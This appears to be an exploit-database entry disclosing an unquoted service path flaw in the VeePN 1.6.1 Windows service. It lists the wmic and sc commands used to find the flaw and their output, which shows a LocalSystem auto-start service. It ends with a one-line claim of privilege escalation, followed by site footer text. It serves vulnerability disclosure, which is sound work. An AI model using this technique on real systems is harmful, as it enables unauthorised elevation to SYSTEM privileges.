# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
# Date: 2024-12-27
# Exploit Author: Doğukan Orhan
# Vendor Homepage: https://veepn.com/
# Version: 1.6.1
# Tested on: Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
#Service Info
C:\Users\PC>sc qc VeePNService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VeePNService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VeePN\service\VeePNService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VeePNService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.Credits and Partners
All rights reserved nPulse.net 2009 - 2025
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
